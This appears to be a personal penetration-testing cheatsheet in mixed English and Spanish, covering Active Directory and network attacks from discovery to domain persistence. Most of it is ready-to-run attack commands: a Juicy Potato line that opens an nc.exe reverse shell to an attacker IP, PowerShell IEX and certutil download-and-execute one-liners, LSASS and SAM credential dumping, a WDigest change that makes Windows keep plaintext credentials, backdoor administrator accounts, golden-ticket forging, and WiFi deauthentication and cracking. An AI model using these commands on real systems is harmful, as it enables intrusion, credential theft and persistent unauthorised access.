Cheatsheet interno

# Cheatsheet Extra: dehashed a csv ``` jq '[.entries[] | {email:.email,password:.password}]' file.dehashed | jq -r '(.[0] | keys_unsorted) as $keys | $keys, map([.[ $keys[] ]])[] | @csv' | uniq | tr -d '"' | sed 1d | tr ',' ':' ``` Reeplace line break with comma ``` sed -z 's/\n/,/g' FI ``` ## NAC Bypass Change MAC address ```MJ macchanger -m XX:XX:XX:XX:XX:XX ``` **UDP Filtering** Sometimes NAC solutions will only disallow TCP connections but UDP connections would still be allowed and an attacker can leverage this to conduct NETBIOS scan in order to obtain IP and MAC addresses. ``` nbtscan 192.168.112.xx ``` ## Routes ADD & DELETE (VPN) ``` sudo route del -net 169.255.0.0/16 eth0 or ip r del 172.18.0.0/24 via 172.31.100.1 ADD METRIC TEMPORARY ifmetric wlan0 0 ADD METRIC FIX "nano /etc/network/interfaces" auto wlx00e022000576 iface wlx00e022000576 inet dhcp address 192.168.8.125/24 gateway 192.168.8.1 up ifmetric wlan0 0 ``` ## Discovery #### Domain Discovery ``` dig ANY <domain> @DNS_IP dig +noall +multiline <domain> any dig nombre_host.dominio.cl NS fierce -d <domain> ``` #### DNS Scan ``` Dig -t SRV _gc._tcp.<domain fqdn> Dig -t SRV _ldap._tcp.<domain fqdn> Dig -t SRV _kerberos._tcp.<domain fqdn> Dig -t SRV _kpasswd._tcp.<endpoint fqdn> Nmap — script dns-srv-enum –script-args “dns-srv-enum.domain=’<domain fqdn>’” ``` #### ARP discovery ``` db_nmap -sn <network> netdiscover -r <network> ``` #### NBT Discovery ``` nbtscan -r <network> ``` #### Ping Discovery ``` fping -ag 10.10.0.0/16 | tee archivo.txt ping -b 10.10.5.255 (ping to network broadcast address) ping -b 255.255.255.255 nmap -PEPM -sP -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests ``` ## IPv6 ``` alive6 <interface> (eth0...) use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement; set INTERFACE eth1; run Address Description ff02::1 All nodes on the local network segment ff02::2 All routers on the local network segment ff02::5 OSPFv3 All SPF routers ff02::6 OSPFv3 All DR routers ff02::8 IS-IS for IPv6 routers ff02::9 RIP routers ff02::a EIGRP routers ff02::d PIM routers ff02::16 MLDv2 reports ff02::1:2 All DHCP servers and relay agents on the local network segment ff02::1:3 All LLMNR hosts on the local network segment ff05::1:3 All DHCP servers on the local network site ff0x::c Simple Service Discovery Protocol ff0x::fb Multicast DNS ff0x::101 Network Time Protocol ff0x::108 Network Information Service ff0x::181 Precision Time Protocol (PTP) version 2 messages except peer delay measurement ff02::6b Precision Time Protocol (PTP) version 2 peer delay measurement messages ff0x::114 Experimental ______________________ Netstat route: netstat -rn -A inet6 ______________________ PING: ping fe80::a469:28c6:3e90:d988%eth0 ping6 -I eth0 ff02::1 | cut -d\ -f4 Link local multicast ping: Linux: ping6 -I eth0 ff02::1 Win: ping - 6 ff02::1 ______________________ NMAP: nmap -6 -e eth0 fe80::/10 -P0 -n -p 3389 -T5 nmap -6 -e eth0 fe80::552c:9b5b:387:6289 -P0 -n -T5 --open _________________________ GET IPv6 Address Without Scanning sudo tshark -i eth0 -nn -e ipv6.src -e eth.src_resolved -T fields -E separator=/s -Y ipv6 -o nameres.mac_name:TRUE > ipv6_address_macvendor.txt Filter duplicate IPv6 addr and mac vendor: awk ‘!array_temp[$0]++’ ipv6_address_macvendor.txt > uniques.txt ``` Man in the Middle IPv6 https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ NTLM Relaying and Kerberos Delegation https://book.hacktricks.xyz/pentesting/pentesting-network/pentesting-ipv6 Search within the segments found: ``` #!/bin/bash function showme_help { echo " [+] Use:" echo -e " $0 <IP> \n" exit 1 } IP_ADDRESS=$1; function split_ip { echo $IP_ADDRESS | awk -F "." '{print $1"."$2"."$3"."}' #echo $IP_ADDRESS | awk -F "." '{print $1"."$2"."$3".0/24"}' } function Get_dns { echo -e " [+] Init Reverse IP\n" echo -e " [!] CIDR Scan: $(split_ip)0/24\n" for ip in $(seq 1 255); do host_ip=$(split_ip)"$ip"; reserse_ip=$(host $host_ip | grep -v "not found"| awk -F " " '{print $5}') if [ -n "$reserse_ip" ]; then echo -e $host_ip" \t\t\t"${reserse_ip::-1} ; fi done echo -e " \n[!] fin\n" exit 1 } Get_dns ``` ## Scan ``` nmap -P0 -n -p1-65535 --open --reason -sS -T5 --min-parallelism 65535 --max-retries 2 IP_ADDRESS sudo nmap -P0 -n -p 500 --open --reason -sU -T5 --min-parallelism 65535 --max-retries 2 X.X.X.X/XX -oG - | grep "/open" | awk '{ print $1 " " $2 " " $5}' |grep -v 'filtered' sudo nmap -P0 -n -p 8090 --open --reason -sS -T5 --min-parallelism 65535 --max-retries 2 5.36.0.0/16 -oG - | grep "/open" | awk '{ print $2 " " $5}' Masscan accurate port scan: sudo masscan --rate 100 -p1-65535 --open IP_ADDRESS CHILE_SNMP_SYS_DESCR: nmap --script=snmp-sysdescr -P0 -n -p 161 -sU -T5 --min-parallelism 65535 --max-retries 2 -iL CL_IP.txt |grep snmp-sysdescr PING WINDOWS: C:\>FOR /L %x in (1,1,255) do ping -n 1 192.168.2.%x | find /I "reply" >> c:\temp\pingresult.txt cut -d '/' -f 1 SII_PORTS | awk '{ print $2}' | sort -u Scan: sudo nmap -P0 -n -p 161 -sU -T5 --min-parallelism 65535 --max-retries 2 -iL CL_IP.txt -oG - | grep "/open" | awk '{ print $1 " " $2 " " $5}' |grep -v 'filtered' > SNMP_CL Filter: grep -E -o '((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' SNMP_CL > SNMP_IP Extract: for i in $(cat TEMP_sysName_CL_IP); do echo $i && snmpwalk -cpublic -v2c $i; done > TEMP_sysName_CL_Result ``` ## Service Scanning ##### Using msfconsole workspace ``` sudo msfdb init (start msf DB) sudo msfconsole workspace -a <workspace_name> ``` ##### Using db_nmap for service discovery ``` db_nmap -sV -sC -0 -T4 -n -Pn -oA fastscan <ip> db_nmap -sSV -P0 128.1.1.0/24 -p 22,137,445,80,8080,3389,1433,443,5985,53,88,139 --open -oA network_10.10.10.0 (common ports) db_nmap -sU -sV --version-intensity 0 -n -F -T4 <IP> (udp) nmap -T4 -sY -n -oA SCTFastScan <IP> (sctp for telephony data over IP) nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP> masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24 ``` #### Sniffing Tools ``` sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host tcpdump -i <IFACE> icmp #Listen to icmp packets sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &" ``` #### Discover Exploits ``` searchsploit "string" searchsploit --nmap file.xml #Search vulns inside an nmap xml result msf> search platform:windows port:<port_number> target:XP type:exploit ``` ### Enumeration without Credentials #### SMB ``` enum4linux -a -u "" -p "" <DC_IP> enum4linux -a -u "guest" -p "" <DC_IP> smbmap -u "" -p "" -P 445 -H <DC IP> smbmap -u "guest" -p "" -P 445 -H <DC IP> smbclient -N -L \\\\IP smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L // crackmapexec smb <dc_ip> -u '' -p '' --users (to get possible users) ``` #### Enumerating LDAP ``` db_nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP> ldapsearch -x -h <IP> -D '' -w '' -b "DC=<subdomain.domain>,DC=<com>" ``` #### Enumerating kerberos ``` nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP> Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP> ``` #### ASREPRoast ``` python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast pyhton GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username python3 GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/' hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt #cracking hashes using hashcat ``` #### RPC ``` rpcclient -U "" -N <host> -W <domain> querydispinfo enumdomusers enumdomgroups ``` #### Using Responder ``` responder -I <interface> --lm ``` #### Creating a wordlist 1. Generate a small wordlist using common words 2. Add years and symbols to it ``` for i in $(cat dict.txt); do echo $i; echo${i}.2021; echo${i}.2022\!; done >> dict2.txt ``` 3. Use rules ``` hashcat —force —stdout dict2.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule >> dict3.txt ``` 4. Sort it and count the characters so they match the password policy ##### SMB Relay * Only works if SMB signing is disabled 1. Modify Responder.conf, HTTP and SMB Off ``` responder -I <interface> rdwv ``` 2. `ntlmrelayx.py -tf <targets_file> -smb2support` #### Password Spraying ``` crackmapexec <IP> -u '' -p '' --pass-pol # get the password policy and not block users crackmapexec <IP> -u users.txt -p pass.txt smb (add domain but it could block users) scanner/smb/smb_login #msfconsole ``` ## Enumeration with Domain Credentials #### Using Bloodhound ``` bloodhound-python -d <domain> -u <user> -p <password> -gc DC01.lab.local -c all proxychains bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all --dns-tcp ``` #### LDAP ``` ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>" -x Simple Authentication -h LDAP Server -D My User -w My password -b Base site, all data from here will be given ``` #### SMB for shares ``` smbclient -U 'username' -P 'password' \\\\IP\\share smbmap -u "username" -p "password" -H <IP> ``` **Common shares:** 1. C$ 2. D$ 3. ADMIN$ 4. IPC$ 5. PRINT$ 6. FAX$ 7. SYSVOL$ 8. NETLOGON$ #### SPN Tickets ``` impacket-GetUserSPNs <domain>/<user>:<password> -request -save -dc-ip <IP> ``` ## Common Vulnerabilities #### MS17_010 ``` auxiliary/scanner/smb/smb_ms17_010 services -p 445 -R u set Threads 11 run ``` #### Bluekeep ``` auxiliary/scanner/rdp/cve_2019_0708_blueekeep services -p 3389 -R u set Threads 11 run ``` #### FTP anonymous/default credentials ``` auxiliary/scanner/ftp/ftp_login services -P 21 -R -u set USERNAME <username> set PASSWORD <password> run ``` #### SSH Login ``` auxiliary/scanner/ssh/ssh_login services -p 22 -R -u set THREADS 11 set USERNAME <username> set PASSWORD <password> ``` #### ProxyLogon/Proxyshell python3 proxyshell.py -u <machine.domain> -e administrator@domain.com #### Print Nightmare **Check if vulnerable** ``` rpcdump.py @<dc_ip> -p 135 | egrep 'MS-RPRN|MS-PAR' ``` 1. Locate domain controller 2. Test user credentials in domain (msf6 auxiliary(scanner/smb/smb_login)) 3. download python git clone https://github.com/cube0x0/CVE-2021-1675.git 4. install impacket version git clone https://github.com/cube0x0/impacket 5. have the adduser dll 6. modify smbconf and restart samba 7. cp dll to /tmp folder 8. python3 CVE-2021-1675.py domain/user:password@DC_IP '\\kali_ip\smb\evil.dll' #### Juicy Potato ``` juicypotato -l 1337 -p C:\windows\system32\cmd.exe -a "/c C:\path\to\nc.exe -e cmd.exe attacker_ip port" -t * ``` CLSID: http://ohpe.it/juicy-potato/CLSID/ Ref: https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato#juicy-potato-abusing-the-golden-privileges ## Post-Compromise #### Add user ``` net user /add nb password123 net localgroup administrators nb /add ``` #### Dump creds ``` secretsdump.py -sam sam.save -security security.save -system system.save LOCAL ``` #### Allow RDP ``` reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=Yes net localgroup "Remote Desktop Users" nb /ADD ``` #### Dump LSASS Leer lsass local en kali pypykatz lsa minidump lsass.DMP ## Useful Tools & Commands **Local Port Forwarding** ``` ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER 1. [LOCAL_IP:]LOCAL_PORT - The local machine IP address and port number. When LOCAL_IP is omitted, the ssh client binds on the localhost. 2. DESTINATION:DESTINATION_PORT - The IP or hostname and the port of the destination machine. 3. [USER@]SERVER_IP - The remote SSH user and server IP address. ``` **Remote Port Forwarding** ``` ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER 1.[REMOTE:]REMOTE_PORT - The IP and the port number on the remote SSH server. An empty REMOTE means that the remote SSH server will bind on all interfaces. 2. DESTINATION:DESTINATION_PORT - The IP or hostname and the port of the destination machine. 3. [USER@]SERVER_IP - The remote SSH user and server IP address. ``` # Extras - Windows ## POST Explotación (low privileges) ## SMB SERVER KALI LINUX ``` impacket-smbserver -smb2support 'prueba' /home/linux/Descargas Correr binario desde comsola de Windows por SMB: \\192.168.0.18\prueba\BYPASS_DEFENDER.exe ``` ## Listar Domain Controllers ``` netdom query /d:HOLA DC or nltest /dclist:HOLA.COM ``` ## Listar FSMO Roles (PDC,etc...) ``` netdom query fsmo ``` ## Listar Usuarios de una OU ``` dsquery user "OU=Arica,OU=Muelles Unit,OU=Regiones,DC=hola,DC=com" | dsget user -samid -fn -ln -display ``` ## Listar Creacion, Modificacion y Ultimo Logon de Usuarios ``` Get-ADUser -Filter {Enabled -eq $True} -Property Created,Modified,LastLogonDate | Select-Object -Property Name, SAMAccountName, Created, Modified, LastLogonDate ``` ## Listar Logon Server ``` echo %logonserver% ``` ## Enumerar usuarios de dominio ```shell PS:\> NET USERS /DOMAIN >USERS.TXT. ``` Cuenta actual en uso ```shell PS:\> Whoami PS:\> $env:username PS:\> echo %USERNAME% ``` ## Active directory Enum Luego del compromiso de alguna máquina de la red, es necesario hacer una apropiada enumeración. A continuación algunos comandos que pueden ser de utilidad. Enumerar máquinas conectadas al AD: ```powershell PS:\> Get-ADComputer -Filter * -Properties ipv4Address, OperatingSystem, OperatingSystemServicePack | Format-List name, ipv4*, oper* ``` Otra forma de hacer lo mismo: ```powershell PS:\> wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname | nslookup ``` ### busqueda de credenciales ``` dir /s *pass* == *cred* == *vnc* == *.config* findstr /si password *.xml *.ini *.txt reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ## Privilege Scalation Scripts - https://github.com/HarmJ0y/PowerUp - https://github.com/AlessandroZ/BeRoot - https://github.com/pentestmonkey/windows-privesc-check - https://github.com/rasta-mouse/Sherlock - https://github.com/AonCyberLabs/Windows-Exploit-Suggester - https://github.com/carlospolop/PEASS-ng (linpeass linux, winpeas para windows) para usar sherlock: ``` powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}" ``` ## Reverse shells interesantes - https://github.com/samratashok/nishang/tree/master/Shells ## Empezar a guardar creds en memoria ``` reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 ``` ## SMB Para montar una carpeta compartida: ``` mount -t cifs "//10.10.10.103/Department Shares" /mnt ``` enumerar carpetas compartidas: ``` smbclient -N -L \\\\10.10.10.103 ``` Buscar si en algun directorio es escribible ``` find . -type d | while read directory; do touch ${directory}/0xdf 2>/dev/null && echo "${directory} - write file" && rm ${directory}/0xdf; mkdir ${directory}/0xdf 2>/dev/null && echo "${directory} - write directory" && rmdir ${directory}/0xdf; done ``` agregar usuario a smb ``` REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f ``` En el caso de que sea posible conectarse a SMB usando el usuario anonimo pero esta no liste ninguna carpeta comaprtida, podemos usar crackmapexec para obtener información del dominio: ``` crackmapexec smb <IP> -u '' -p '' --users crackmapexec smb <IP> -u '' -p '' --groups crackmapexec smb <IP> -u '' -p '' --pass-pol ``` ## Obtener tickets SPN Cualquier usuario del dominio, independientemente de sus privilegios, puede solicitar los tickets SPN de los servicios, tanto con herramientas nativas, como de terceros. Un SPN es un identificador único de una instancia de servicio, como por ejemplo, IIS, MSSQL, CIFS. La autenticación de Kerberos utiliza los SPN para asociar una instancia de servicio con una cuenta de inicio de sesión de servicio. Esto permite que una aplicación cliente solicite que el servicio autentique una cuenta incluso si el cliente no tiene el nombre de la cuenta. Estas cuentas suelen ser configuradas por humanos y, por ende, siempre es probable que quien la configuró haya definido una contraseña débil, y esto hace a la cuenta vulnerable a ataques como el Kerberoasting. ``` python GetUserSPNs.py <dominio>/<usuario de dominio> -dc-ip <IP DC> -request #aqui se abrira un prompt para password ``` ## RDP Conectarse usando xfreerdp ``` xfreerdp /v:172.16.0.78 /u:dl_user /p:'Hacker.1' /drive:share,/root/share/ ``` conectarse usando rdesktop: ``` rdesktop -u offsec -p [mipass] 10.11.24.189 rdesktop -u offsec -p [mipass] 10.11.24.189 -g 1280x1024 #resize ``` Habilitar RDP ``` reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=Yes net localgroup "Remote Desktop Users" jscott /ADD ``` RDP con carpeta compartida ``` rdesktop -u Administrador -p PASSSWORD -r disk:share=/root/ -g 1280x1024 <IP> ``` # POST EXPLOITATION CON PRIVILEGIOS #### Agregamos usuario a grupo administrador ``` net user /add nb password123 net localgroup administrators nb /add ``` #### Agregamos usuarios a SMB ``` REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f ``` #### habilitamos registro RDP ``` reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ``` #### Permitimos uso de RDP en firewall ``` netsh advfirewall firewall set rule group="remote desktop" new enable=Yes ``` #### Agregamos usuario al grupo de la nueva regla de firewall ``` net localgroup "Remote Desktop Users" nb /ADD ``` #### Dump domain creds dump domain admin ntds.dit y el archivo SYSTEM ``` powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" ``` En el caso en que las creds no se esten guardando por defecto (como en el caso de windows 10 ena delante), se sugiere habilitar la llave de registro para que comience a guardar las creds en la BD y luego de x horas dumpearlo (servivira perfactamente en un exchange por ejemplo). ``` reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 ``` Luego de forma local, dumpeamos el dominio: ``` ./secretsdump.py -ntds /root/ntds.dit -system /root/system LOCAL ``` #### Robar sam, security y sistem ``` reg.exe save hklm\sam c:\windows\temp\sam.save reg.exe save hklm\security c:\windows\temp\security.save reg.exe save hklm\system c:\windows\temp\system.save ``` De forma local, sacamos las creds: ``` secretsdump.py -sam sam.save -security security.save -system system.save LOCAL ``` #### Dumpear lsass de máquina ``` procdump64.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 ``` ```shell .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full ``` #### Descargar y ejecutar archivos: ``` PowerShell (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.10:8000/PowerUp.ps1','powerup.ps1') powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/a'))" ``` ``` Import-Module BitTransfer: Start-BitsTransfer -Source 'URL ql' -Destination example.file ``` ``` powershell -c "Invoke-WebRequest -Uri 'https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.2/lazagne.exe' -OutFile 'lz.exe'" ``` ``` powershell "IEX(New-Object Net.WebClient).downloadString('https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.2/lazagne.exe')" ``` ``` bitsadmin /transfer download /priority normal http://IP_ADDR/file C:\output\path (Works on Windows 7/Windows Server 2000+) ``` ``` nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine) ``` ``` ftp -s:input.txt ``` ``` tftp -i get file /path/on/victim ``` ``` powershell.exe -exec bypass -Command “& {iex((New-Object System.Net.WebClient).DownloadFile(‘http://IP_ADDR:PORT/FILE','C:\Users\user\AppData\Local\ack.exe'));}” ``` ``` certutil -urlcache -split -f “http://IP_ADDR/FILE" FILENAME ``` Conocer dominios y GPOS ``` gpresult /r ``` ## Golden ticket Se requieren dos condiciones para obtener un golden ticket y generar persistencia en un ambiente AD: - Hash NTLM de usuario KRBTGT - Domain’s Security Identifier (SID) del usuario KRBTGT Este ataque, lo realizaremos con el objetivo de obtener persistencia dentro de la red de active directory, por lo que no es una vulnerabilidad como tal. Para obtener el hash ntlm del usuario krbtgt, podemos usar secrets dump con una cuenta domain admin. ```shell python3 secretsdump.py htb.local/Administrator@10.10.10.161 -hashes :32693b11e6aa90eb43d32c72a07ceea6 -just-dc-user krbtgt ``` Luego, para obtener el SID del usuario, podemos usar wmic o powerview.ps1 : ```batch C:> wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid ``` Luego, debemos sincronizar la hora de nuestra máquina con la del DC para poder generar el ticket y cualquier query al DC. Esto podemos hacerlo utilizando ntp. ```shell sudo sntp <dc-ip> ``` Luego editamos el /etc/hosts con la IP del DC y el dominio de la máquina. Finalmente, generamos el goldenticket de la siguiente manera: ```shell python3 ticketer.py -nthash <hash krbtgt> -domain-sid <SID krbtgt> -domain <dominio> <nombre random del ticket> ``` Con esto se generará un archivo de extencion .ccache del estilo `<nombre_random_del_ticket.ccache>` que utilizaremos para impersonar usuarios en la red. Pero antes de ello, debemos exportar una varibale de entorno con el nombre del archivo generado: ```shell export KRB5CCNAME=Administrator.ccache # aqui va el nombre random que le pusimos al ticket ``` y ya podemos loguearnos en cualquier máquina usando psexec o wmiexec. ```shell python3 wmiexec.py <dominio>/Administrator@FOREST.HTB.LOCAL -k -no-pass -dc-ip 10.10.10.161 ``` referencia: https://medium.com/bugbountywriteup/forest-an-asreproast-dcsync-and-golden-ticket-hackthebox-walkthrough-ade8dcdd1ee5 ### WiFi (Extra) ``` Visualizar redes sudo airodump-ng -band abg -a --manufacturer --wps wlan0 Alternativa: sudo wavemon Modo monitor sudo airmon-ng start wlp0s20f0u2 Captura sudo airodump-ng wlp0s20f0u2 -a --bssid <MAC> --channel <CH> -w output Deauth AP sudo aireplay-ng --deauth 0 -a <MAC AP> wlp0s20f0u2 Deauth AP + CLI sudo aireplay-ng --deauth 0 -a <MAC AP> -c <MAC CLI> wlp0s20f0u2 Cracking aircrack-ng sudo aircrack-ng output-0*.cap -w <diccionario> Cracking Hashcat cap2hccapx <captured.cap> <output.hccapx> hashcat -a 0 -m 2500 <output.hccapx> <diccionario> -r <rules> --show PMKID sudo airodump-ng wlp0s20f0u2 -a --essid “<nombre_wifi>” -w captura --channel <CH> hcxdumptool -i wlp0s20f0u2 --enable_status=5 (Capture all PMKID) hcxdumptool -o <output> -i wlp0s20f0u2 --enable_status=1 filterlist_ap=<SSID> --filtermode=2 hcxcaptool <output.hccapx> -z <outputhash> hashcat -m 16800 >outputhash> <diccionario> ``` # Extras Problemas para montar un disco externo: ``` sudo ntfsfix /dev/"device name" ``` ## Useful links: 1. Different payloads, cheatsheets and methodologies https://github.com/swisskyrepo/PayloadsAllTheThings/ 2. Hacktricks: https://github.com/carlospolop/hacktricks 3. Wordlists (for attacks, password and discorvery): https://github.com/danielmiessler/SecLists https://haxx./files/blasty-vs-pkexec.c